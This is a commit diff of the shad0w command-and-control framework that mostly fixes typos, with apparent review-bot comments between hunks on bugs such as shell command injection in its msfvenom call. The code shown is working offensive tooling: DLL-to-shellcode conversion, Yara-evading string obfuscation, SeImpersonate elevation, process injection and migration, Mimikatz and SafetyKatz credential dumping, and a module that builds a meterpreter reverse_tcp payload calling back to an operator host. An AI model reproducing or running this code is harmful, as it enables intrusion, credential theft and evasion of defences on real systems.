Lee Baird 2021-01-15 10:15:42 -05:00
parent c9fb057ccc
commit 2e6194f6a5
56 changed files with 198 additions and 210 deletions


@ -1,7 +1,3 @@
#
# Abuse the SeImpersonate token to elevate privilages to system
#
from lib import buildtools
__description__ = {
@ -11,7 +7,7 @@ __description__ = {
"Versions": "All",
"Arch": "x64",
"Secure": True,
"Details": "Abuse the SeImpersonate token to elevate privilages to system"
"Details": "Abuse the SeImpersonate token to elevate privilege to system"
}
def check_callback(shad0w, data):


@ -67,13 +67,13 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
bootstrap = b''
bootstrapSize = 64
# call next instruction (Pushes next instruction address to stack)
# call next instruction (pushes next instruction address to stack)
bootstrap += b'\xe8\x00\x00\x00\x00'
# Set the offset to our DLL from pop result
dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
# pop rcx - Capture our current location in memory
# pop rcx - capture our current location in memory
bootstrap += b'\x59'
# mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
@ -83,17 +83,17 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
bootstrap += b'\x48\x81\xc1'
bootstrap += pack('I', dllOffset)
# mov edx, <Hash of function>
# mov edx, <hash of function>
bootstrap += b'\xba'
bootstrap += pack('I', functionHash)
# Setup the location of our user data
# add r8, <Offset of the DLL> + <Length of DLL>
# add r8, <offset of the DLL> + <length of DLL>
bootstrap += b'\x49\x81\xc0'
userDataLocation = dllOffset + len(dllBytes)
bootstrap += pack('I', userDataLocation)
# mov r9d, <Length of User Data>
# mov r9d, <length of User Data>
bootstrap += b'\x41\xb9'
bootstrap += pack('I', len(userData))
@ -103,27 +103,27 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
# mov rsi, rsp - store our current stack pointer for later
bootstrap += b'\x48\x89\xe6'
# and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
# and rsp, 0x0FFFFFFFFFFFFFFF0 - align the stack to 16 bytes
bootstrap += b'\x48\x83\xe4\xf0'
# sub rsp, 0x30 - Create some breathing room on the stack
# sub rsp, 0x30 - create some breathing room on the stack
bootstrap += b'\x48\x83\xec'
bootstrap += b'\x30' # 32 bytes for shadow space + 8 bytes for last arg + 8 bytes for stack alignment
# mov dword ptr [rsp + 0x20], <Flags> - Push arg 5 just above shadow space
# mov dword ptr [rsp + 0x20], <flags> - push arg 5 just above shadow space
bootstrap += b'\xC7\x44\x24'
bootstrap += b'\x20'
bootstrap += pack('I', flags)
# call - Transfer execution to the RDI
# call - transfer execution to the RDI
bootstrap += b'\xe8'
bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # skip over the remainder of instructions
bootstrap += b'\x00\x00\x00'
# mov rsp, rsi - Reset our original stack pointer
# mov rsp, rsi - reset our original stack pointer
bootstrap += b'\x48\x89\xf4'
# pop rsi - Put things back where we left them
# pop rsi - put things back where we left them
bootstrap += b'\x5e'
# ret - return to caller
@ -145,10 +145,10 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
bootstrap = b''
bootstrapSize = 46
# call next instruction (Pushes next instruction address to stack)
# call next instruction (pushes next instruction address to stack)
bootstrap += b'\xe8\x00\x00\x00\x00'
# Set the offset to our DLL from pop result
# set the offset to our DLL from pop result
dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
# pop eax - Capture our current location in memory
@ -163,20 +163,20 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
# mov ebx, eax - copy our location in memory to ebx before we start modifying eax
bootstrap += b'\x89\xc3'
# add eax, <Offset to the DLL>
# add eax, <offset to the DLL>
bootstrap += b'\x05'
bootstrap += pack('I', dllOffset)
# add ebx, <Offset to the DLL> + <Size of DLL>
# add ebx, <offset to the DLL> + <size of DLL>
bootstrap += b'\x81\xc3'
userDataLocation = dllOffset + len(dllBytes)
bootstrap += pack('I', userDataLocation)
# push <Flags>
# push <flags>
bootstrap += b'\x68'
bootstrap += pack('I', flags)
# push <Length of User Data>
# push <length of User Data>
bootstrap += b'\x68'
bootstrap += pack('I', len(userData))
@ -190,9 +190,9 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
# push eax
bootstrap += b'\x50'
# call - Transfer execution to the RDI
# call - transfer execution to the RDI
bootstrap += b'\xe8'
bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # skip over the remainder of instructions
bootstrap += b'\x00\x00\x00'
# leave


@ -32,7 +32,7 @@ class BaseCommand:
return
def parse(self):
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
self.args = self.parser.parse_args(self.args[1:])
except:


@ -20,10 +20,9 @@ exploits, etc, staged payloads are recommended as they are much smaller and easi
"""
def clone_source_files(rootdir="src", builddir="build", basedir="/root/shad0w/beacon", asm=False, backmake=False):
# move the source files of the beacon over
# to the build directory
# move the source files of the beacon over to the build directory
# put us in the correct dir (this obviously needs to be inside docker)
# put us in the correct dir (this obviously needs to be inside Docker)
os.chdir(basedir)
# clean the build dir
@ -38,8 +37,7 @@ def clone_source_files(rootdir="src", builddir="build", basedir="/root/shad0w/be
return
def update_settings_file(shad0wbuild, custom_template=None, custom_path=None):
# update the settings so that when we build
# we will use our new args
# update the settings so that when we build, we will use our new args
# this is hardcoded so will need docker
if custom_path == None:
@ -79,7 +77,7 @@ def _gen_key(name):
def _crypt_strings():
# encrypt strings so they are not hanging around in the binary waiting to be
# thrown into a yara rule. This is obsfication not encryption
# thrown into a Yara rule. This is obfuscation not encryption
new_file = ""
@ -164,11 +162,10 @@ def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=N
return True
def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=False, donut=True, srdi=False):
# use donut or srdi to extract the shellcode from
# our newly created beacon
# use Donut or srdi to extract the shellcode from our newly created beacon
if donut and not srdi:
# use donut to get it
# use Donut to get it
if want_base64 is False:
code = shellcode.generate(beacon_file, None, None, parse=False)
@ -184,7 +181,7 @@ def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=
# null out the pe header
flags |= 0x1
# obfusicate the imports, with no delay
# obfuscate the imports, with no delay
flags = flags | 0x4 | 0 << 16
if want_base64 is False:
@ -241,7 +238,7 @@ def get_payload_variables(payload_string, warn=True):
except IndexError:
raise_issue_payload(payload_string)
# these two dont matter as much
# these two don't matter as much
try:
secure = payload[2]
static = payload[3]
@ -329,14 +326,14 @@ def shellcode_to_array(data):
line_len += 1
continue
# keep the correct sytax at the start
# keep the correct syntax at the start
if length == 0:
array += f"{hex(i)}, "
length += 1
line_len += 1
continue
# keep the correct synatx though out
# keep the correct syntax though out
elif length != 0:
array += f"{hex(i)}, "
length += 1
@ -368,7 +365,7 @@ def elevate_build_stage(shad0w, rootdir=None, os=None, arch=None, secure=None, f
update_settings_file(None, custom_template=settings_template)
# now we need to run 'make' inside the cloned dir
# shad0w.debug.spinner(f"Preparing exploit...")
# shad0w.debug.spinner(f"Preparing exploit.")
make_in_clone(arch=arch, platform=os, secure=secure, static=True)
# shad0w.debug.stop_spinner = True
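Review bot: In shellcode_to_array the `if length == 0:` and `elif length != 0:` branches append the same `f"{hex(i)}, "` text and bump the same counters as far as the hunk shows, so the two "keep the correct syntax" comments document a distinction the code does not make; one unconditional block would read more honestly. The second of those comments still says "though out" after this commit and should read `# keep the correct syntax throughout`. In update_settings_file, `if custom_path == None:` is better written as `if custom_path is None:`. Each of these functions continues outside the hunks shown, so the rest of their bodies was not reviewed.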


@ -8,7 +8,7 @@ __description__ = "Interact with or display current beacons"
__author__ = "@_batsec_"
def _list_beacons(shad0w):
# i have gcse english, i gonna use it
# I have gcse english, I gonna use it
if shad0w.beacon_count == 1:
shad0w.debug.log(f"{shad0w.beacon_count} active beacon\n", log=True)
else:


@ -140,7 +140,7 @@ binject -b x64/windows/secure -p 9207
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
cmd = BinjectCommand(args)


@ -60,13 +60,13 @@ cat C:\\Users\\thejoker\\Desktop\\evil_plans.txt
# setup the args
parse.add_argument("file", nargs='*', help="file you want to display the contents of")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# we need a file to read so if we dont then fail
# we need a file to read so if we don't then fail
if len(args.file) == 0:
print(error_list)
parse.print_help()
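Review bot: The bare `except: pass` around `parse.parse_args(args[1:])` leaves `args` bound to the original list when parsing raises, so the next statement, `if len(args.file) == 0:`, would fail with an AttributeError instead of printing usage. A bare `except:` also swallows KeyboardInterrupt and SystemExit; `except Exception:` followed by `parse.print_help()` and `return` keeps the "don't die from weird args" intent without falling through. The same try/except shape is visible in the download, elevate and meterpreter sections of this commit, and its start appears, cut off at the hunk edge, in most of the other command modules. The enclosing function starts and ends outside this hunk.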


@ -75,7 +75,7 @@ cd "C:\\Documents and Settings"
# setup the args
parse.add_argument("dir", nargs='*', help="Location of the dir you want to change to")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:


@ -52,7 +52,7 @@ die -y
# set the args
parse.add_argument("-y", "--yes", action='store_true', help="Confirm the death of the beacon")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:


@ -62,7 +62,7 @@ dllinject -p 4267 -f yourfile.dll
def run(self, shad0w):
rcode = get_file_data(self.args.file)
if rcode is None:
shad0w.debug.error(f"DLL '{self.args.file}' does not exist")
shad0w.debug.error(f"DLL '{self.args.file}' does not exist.")
return
inject_info = build_inject_info(self.args, rcode)
@ -73,7 +73,7 @@ dllinject -p 4267 -f yourfile.dll
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
cmd = DllinjectCommand(args)


@ -27,7 +27,7 @@ def format_data(shad0w, data):
def dotnet_callback(shad0w, data):
# well its kinda true
if "v" not in data:
shad0w.debug.error(".NET is not installed")
shad0w.debug.error(".NET is not installed.")
return ""
data = data.split("C:\\Windows\\Microsoft.NET\\Framework64\\")
@ -45,7 +45,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# clone all the source files


@ -18,7 +18,7 @@ ERROR = False
error_list = ""
# name of the file to download
FILE_TO_DOWLOAD = ""
FILE_TO_DOWNLOAD = ""
# let argparse error and exit nice
def error(message):
@ -31,20 +31,20 @@ def exit(status=0, message=None):
return
def download_callback(shad0w, data):
global FILE_TO_DOWLOAD
global FILE_TO_DOWNLOAD
shad0w.beacons[shad0w.current_beacon]["callback"] = None
FILE_TO_DOWLOAD = ''.join(FILE_TO_DOWLOAD)
FILE_TO_DOWNLOAD = ''.join(FILE_TO_DOWNLOAD)
shad0w.debug.good(f"Downloading '{FILE_TO_DOWLOAD}' ({len(data)} bytes)")
shad0w.debug.good(f"Downloading '{FILE_TO_DOWNLOAD}' ({len(data)} bytes)")
# change to the dir of the folder mapped to the users current dir
os.chdir("/root/shad0w/.bridge")
# os.unlink(FILE_TO_DOWLOAD)
# os.unlink(FILE_TO_DOWNLOAD)
with open(FILE_TO_DOWLOAD, 'wb') as file:
with open(FILE_TO_DOWNLOAD, 'wb') as file:
file.write(base64.b64decode(data))
# change the dir to our root
@ -56,11 +56,11 @@ def download_callback(shad0w, data):
def main(shad0w, args):
global FILE_TO_DOWLOAD
global FILE_TO_DOWNLOAD
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# usage examples
@ -83,13 +83,13 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
# setup the args
parse.add_argument("file", nargs='*', help="File you want to download")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# we need a file to read so if we dont then fail
# we need a file to read so if we don't then fail
if len(args.file) == 0:
print(error_list)
parse.print_help()
@ -102,7 +102,7 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
os.chdir("/root/shad0w/.bridge")
# make this variable global so the call back can access it
FILE_TO_DOWLOAD = args.file
FILE_TO_DOWNLOAD = args.file
# change back to our dir
os.chdir(shad0w_cwd)
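Review bot: `open(FILE_TO_DOWNLOAD, 'wb')` in download_callback uses the joined `args.file` value as the local file name after `os.chdir("/root/shad0w/.bridge")`, so a name containing `/` or `..` is written outside the bridge directory. Reducing the name to its final component and joining it to the bridge path before opening would confine the write, for example `dest = os.path.join(BRIDGE_DIR, ntpath.basename(name))`, where `BRIDGE_DIR` is a placeholder constant and the `ntpath` import is not on the page. `base64.b64decode(data)` runs on beacon-supplied data between the two `os.chdir` calls, so a decode error would presumably leave the process sitting in the bridge directory; building an absolute destination path removes the need to change directory at all. download_callback continues outside the hunk.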


@ -10,7 +10,7 @@ import threading
from prettytable import PrettyTable
__description__ = "Attempt to elevate the beacons privilages on the target"
__description__ = "Attempt to elevate the beacons privileges on the target"
__author__ = "@_batsec_"
ERROR = False
@ -31,7 +31,7 @@ def list_exploits(shad0w):
sys.path.append("/root/shad0w/exploits/")
all_exploits = importlib.import_module("__init__").__all__
shad0w.debug.log(f"{len(all_exploits)} avalible exploits:\n", log=True)
shad0w.debug.log(f"{len(all_exploits)} available exploits:\n", log=True)
t = PrettyTable(['Exploit', 'Description'])
for exploit in all_exploits:
@ -95,7 +95,7 @@ def main(shad0w, args):
# check we got a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# usage examples
@ -120,25 +120,25 @@ elevate --smart
parse.error = error
# setup the args
parse.add_argument("-l", "--list", required=False, action='store_true', help="List the exploits avalible for the current session")
parse.add_argument("-l", "--list", required=False, action='store_true', help="List the exploits available for the current session")
parse.add_argument("-d", "--details", required=False, help="Display the details of an exploit")
parse.add_argument("-c", "--check", required=False, help="Check if the exploit will work")
parse.add_argument("-u", "--use", required=False, help="Use the exploit to attempt to elevate the session")
parse.add_argument("-s", "--smart", required=False, action='store_true', help="Attempt to auto elevate by letting shad0w decide what exploits to use")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# we need a file to read so if we dont then fail
# we need a file to read so if we don't then fail
if ERROR:
print(error_list)
parse.print_help()
return
# list the avalible exploits
# list the available exploits
if args.list:
RAN_COMMAND = True
list_exploits(shad0w)
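Review bot: The comment `# we need a file to read so if we don't then fail` above `if ERROR:` had its spelling fixed but does not describe this code: the command takes no file argument, and the branch fires on the module-level `ERROR` flag, presumably set by the `error` hook assigned to `parse.error`. Suggest `# argparse reported a problem: print the errors and usage, then stop`. In list_exploits, `sys.path.append("/root/shad0w/exploits/")` runs on every call, so the same entry is appended repeatedly; guarding it with `if path not in sys.path:` avoids that. Both functions continue outside the hunks shown.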


@ -80,7 +80,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
cmd = ExecuteCommand(args)


@ -8,6 +8,5 @@ __description__ = "Exit shad0w C2"
__author__ = "@_batsec_"
def main(shad0w, args):
# Once we have logging we will probably want to make a more
# sophisticated exit routine
# Once we have logging we will probably want to make a more sophisticated exit routine
os.sys.exit(0)


@ -18,7 +18,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# make the json


@ -17,7 +17,7 @@ __author__ = "@_batsec_"
# identify the task as shellcode execute
USERCD_EXEC_ID = 0x3000
# location of rubeus binary
# location of Rubeus binary
RUBEUS_BIN = "/root/shad0w/bin/gitl.x64.exe"
# did the command error
@ -70,7 +70,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# usage examples
@ -102,7 +102,7 @@ gitl --disable
parse.add_argument("-e", "--enable", action='store_true', help="Enable the hook (drop all events)")
parse.add_argument("-d", "--disable", action='store_true', help="Disable the hook (allow all events)")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
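Review bot: The comment now reads `# location of Rubeus binary`, but the constant beneath it points at `/root/shad0w/bin/gitl.x64.exe`, so the commit capitalised a comment that was wrong to begin with. Both the comment and the name `RUBEUS_BIN` look copied from the rubeus module; suggest `# location of the gitl binary`. Renaming the constant would also touch its uses, which are outside the hunks shown.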


@ -7,7 +7,7 @@ import importlib
from lib import cmd
from prettytable import PrettyTable
__description__ = "Show shad0ws help infomation"
__description__ = "Show shad0ws help information"
__author__ = "@_batsec_"
def usage(shad0w):
@ -19,7 +19,7 @@ def usage(shad0w):
num_of_modules = len(cmd.Shad0wLexer.commands)
shad0w.debug.log(f"{num_of_modules} avalible commands.", log=True)
shad0w.debug.log(f"{num_of_modules} available commands.", log=True)
shad0w.debug.log(f"To get more info on the usage of the command use the flags -h/--help on it.\n", log=True)
for num, command in enumerate(cmd.Shad0wLexer.commands):
@ -29,12 +29,12 @@ def usage(shad0w):
try:
description = mod.__description__
except:
description = "No description avalible"
description = "No description available."
try:
author = mod.__author__
except:
author = "No author avalible"
author = "No author available."
t.add_row([command, description, author])
if num != num_of_modules - 1:
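Review bot: The two bare `except:` blocks around `mod.__description__` and `mod.__author__` in usage() catch every exception, KeyboardInterrupt included, when the only expected failure is a missing attribute. `description = getattr(mod, "__description__", "No description available.")` and `author = getattr(mod, "__author__", "No author available.")` express the fallback directly and drop eight lines. The "To get more info on the usage" log call uses an f-string with no placeholders, so its `f` prefix can be removed. usage() continues past the end of the hunk.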


@ -62,7 +62,7 @@ hijack -p 4267 -f shellcode.bin
def run(self, shad0w):
rcode = get_file_data(self.args.file)
if rcode is None:
shad0w.debug.error(f"Shellcode file '{self.args.file}' does not exist")
shad0w.debug.error(f"Shellcode file '{self.args.file}' does not exist.")
return
inject_info = build_inject_info(self.args, rcode)
@ -73,7 +73,7 @@ hijack -p 4267 -f shellcode.bin
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
cmd = HijackCommand(args)


@ -29,12 +29,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
lockless_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(lockless_args) != 0:


@ -52,7 +52,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# usage examples
@ -74,9 +74,9 @@ ls "C:\\Documents and Settings"
parse.error = error
# setup the args
parse.add_argument("dir", nargs='*', help="Location of the dir to want to list the contents of")
parse.add_argument("dir", nargs='*', help="Location of the dir you want to list the contents of")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:


@ -1,5 +1,5 @@
#
# metasploit handover module
# Metasploit handover module
#
from lib import buildtools, tools, shellcode
@ -15,7 +15,7 @@ class DummyClass(object):
def __init__(self):
pass
# let argparse error and exit nice
# Let argparse error and exit nice
def error(message):
#global ERROR, error_list
#ERROR = True
@ -29,18 +29,18 @@ def exit(status=0, message=None):
def msfvenom_payload_gen(shad0w, payload, lport, lhost, arch):
# Print some info
shad0w.debug.log(f"Metasploit is building the shellcode...", log=True)
shad0w.debug.log(f"Metasploit is building the shellcode.", log=True)
# put us in the correct dir (inside docker)
# Put us in the correct dir (inside Docker)
os.chdir("/root/shad0w/bin/metasploit")
#Generate the shellcode
# Generate the shellcode
os.system(f"msfvenom -p {payload} LHOST={lhost} LPORT={lport} -f raw -a {arch} > {shad0w.current_beacon}.bin")
#Base64 encode
# Base64 encode
os.system(f"cat {shad0w.current_beacon}.bin | base64 -w 0 > {shad0w.current_beacon}.b64")
# Read and return the b64Shellcode
# Read and return the b64 shellcode
b64File = open(f'{shad0w.current_beacon}.b64',mode='r')
shellCodeB64 = b64File.read()
b64File.close()
@ -50,41 +50,41 @@ def msfvenom_payload_gen(shad0w, payload, lport, lhost, arch):
def main(shad0w, args):
# check we actually have a beacon
# Check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# init the parser
# Init the parser
parser = argparse.ArgumentParser(prog='meterpreter',formatter_class=argparse.RawDescriptionHelpFormatter, epilog="")
# keep it behaving nice
# Keep it behaving nice
parser.exit = exit
parser.error = error
# setup the args, set default='' to show help message when missing
parser.add_argument("--port", required=True, help="Port you would like metasploit to call")
parser.add_argument("--host", required=True, help="Host/IP you would like metasploit to call")
parser.add_argument("--payload", help="What metasploit payload you would like to deploy , default: windows/x64/meterpreter/reverse_tcp",required=False, default="windows/x64/meterpreter/reverse_tcp")
# Setup the args, set default='' to show help message when missing
parser.add_argument("--port", required=True, help="Port you would like Metasploit to call")
parser.add_argument("--host", required=True, help="Host/IP you would like Metasploit to call")
parser.add_argument("--payload", help="What Metasploit payload you would like to deploy, default: windows/x64/meterpreter/reverse_tcp",required=False, default="windows/x64/meterpreter/reverse_tcp")
# make sure we dont die from weird args
# Make sure we don't die from weird args
try:
args = parser.parse_args(args[1:])
except:
pass
#If we are missing port or host (since the skip the above check)
# If we are missing port or host (since the skip the above check)
if not args.port or not args.host:
parser.print_help()
return
#Confirm that the payload used is x64 only
# Confirm that the payload used is x64 only
if "windows/x64/" not in args.payload:
error("Payload needs to be x64 specific!(eg: 'windows/x64/***') Try again!")
error("Payload needs to be x64 specific (eg: 'windows/x64/***'). Try again.")
return
# Generate and read the msfvenom shellcode
rcode = msfvenom_payload_gen(shad0w, payload = args.payload, lport = args.port, lhost = args.host, arch="x64")
# set a task for the current beacon to do
# Set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
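Review bot: msfvenom_payload_gen builds both `os.system` command lines by interpolating `payload`, `lhost`, `lport` and `shad0w.current_beacon` into a shell string, so any shell metacharacter in the `--host`, `--port` or `--payload` values is interpreted by the shell on the server running the console. Calling `subprocess.run` with an argument list, `stdout` set to the opened output file and `check=True`, and replacing the `cat ... | base64 -w 0` pipeline with `base64.b64encode(raw).decode()`, removes the shell and makes a failed build raise instead of returning an empty string; whether `subprocess` and `base64` are already imported is not visible in these hunks. The `b64File` handle should be opened in a `with` block so it is closed if `read()` raises. In main, `"windows/x64/" not in args.payload` is a substring test; `not args.payload.startswith("windows/x64/")` matches what the error message says.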


@ -105,7 +105,7 @@ def generate_beacon_dll(shad0w, rcode):
# check that the dll has built
if made != True:
shad0w.debug.error("Error building migrate dll")
shad0w.debug.error("Error building migrate dll.")
return
# return the base64 dll data
@ -119,7 +119,7 @@ def await_impersonate(shad0w, pid):
imp_beacon_id = shad0w.beacons[shad0w.current_beacon]["impersonate"]
shad0w.beacons[shad0w.current_beacon]["task"] = (0x6000, None)
shad0w.debug.log("Tasked beacon to die", log=True)
shad0w.debug.log("Tasked beacon to die.", log=True)
shad0w.current_beacon = imp_beacon_id
break
@ -131,7 +131,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# usage examples
@ -154,7 +154,7 @@ migrate -p 8725
# set the args
parse.add_argument("-p", "--pid", required=True, help="PID to migrate to")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:


@ -6,13 +6,13 @@ import argparse
from lib import shellcode
__description__ = "Execute mimikatz commands in memory on the target"
__description__ = "Execute Mimikatz commands in memory on the target"
__author__ = "@_batsec_, @gentilkiwi"
# identify the task as shellcode execute
USERCD_EXEC_ID = 0x3000
# location of mimikatz binary
# location of Mimikatz binary
MIMIKATZ_BIN = "/root/shad0w/bin/mimikatz.x64.exe"
# did the command error
@ -46,7 +46,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# usage examples
@ -72,7 +72,7 @@ mimikatz -x sekurlsa::logonpasswords
parse.add_argument("-x", "--execute", nargs='+', required=True, help="Mimikatz command to execute")
parse.add_argument("-n", "--no-exit", action="store_true", required=False, help="Leave mimikatz running")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
@ -90,7 +90,7 @@ mimikatz -x sekurlsa::logonpasswords
if not args.no_exit:
params = params + " exit"
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args.param = args.execute
args.cls = False
args.method = False


@ -37,7 +37,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# usage examples
@ -58,7 +58,7 @@ mkdir "C:\\Users\\thejoker\\hello\\"
# setup the args
parse.add_argument("name", nargs='*', help="Name of the directory you want to create")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:


@ -20,7 +20,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# make the json


@ -132,9 +132,9 @@ psh --info GetHash
parse.add_argument("-c", "--command", nargs="+", required=False, help="Powershell command to execute")
parse.add_argument("-m", "--module", required=False, help="Powershell modules to load")
parse.add_argument("-l", "--list", required=False, action='store_true', help="List all the available modules")
parse.add_argument("-i", "--info", required=False, help="Get infomation on a module")
parse.add_argument("-i", "--info", required=False, help="Get information on a module")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
@ -146,7 +146,7 @@ psh --info GetHash
parse.print_help()
return
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
donut_args = DummyClass()
psh_args = ""


@ -18,7 +18,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
shad0w.debug.error("ERROR: No active beacon.")
return
# make the json


@ -1,6 +1,6 @@
#
#
# Delete something
#
#
import json
import argparse
@ -57,7 +57,7 @@ rm "C:\\Users\\thejoker\\deleteme.txt"
# setup the args
parse.add_argument("name", nargs='*', help="Name of what you want to delete")
# make sure we dont die from weird args
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:


@ -37,7 +37,7 @@ rubeus -x help
if self.args.execute:
params = ' '.join(self.args.execute)
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
self.args.param = self.args.execute
self.args.cls = False
self.args.method = False
@ -59,7 +59,7 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
cmd = RubeusCommand(args)


@ -6,7 +6,7 @@ import argparse
from lib import shellcode
__description__ = "A tool to minidump lsass then use mimikatz sekurlsa::logonpasswords & sekurlsa::ekeys on it"
__description__ = "A tool to minidump lsass then use Mimikatz sekurlsa::logonpasswords & sekurlsa::ekeys on it"
__author__ = "@_batsec_, @harmj0y"
# identify the task as shellcode execute
@ -15,7 +15,7 @@ USERCD_EXEC_ID = 0x3000
# location of safetykatz binary
SAFETYKATZ_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SafetyKatz.exe"
# little hack but lets us pass the args to donut
# little hack but lets us pass the args to Donut
class DummyClass(object):
def __init__(self):
pass
@ -29,12 +29,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
safetykatz_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(safetykatz_args) != 0:


@ -111,7 +111,7 @@ def usage():
RPCMappedEndpoints - Current RPC endpoints mapped
+ SCCM - System Center Configuration Manager (SCCM) settings, if applicable
+ ScheduledTasks - Scheduled tasks (via WMI) that aren't authored by 'Microsoft', "-full" dumps all Scheduled tasks
SearchIndex - Query results from the Windows Search Index, default term of 'passsword'. (argument(s) == <search path> <pattern1,pattern2,...>
SearchIndex - Query results from the Windows Search Index, default term of 'password'. (argument(s) == <search path> <pattern1,pattern2,...>
SecurityPackages - Enumerates the security packages currently available using EnumerateSecurityPackagesA()
Services - Services with file info company names that don't contain 'Microsoft', "-full" dumps all processes
SlackDownloads - Parses any found 'slack-downloads' files
@ -209,12 +209,12 @@ def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
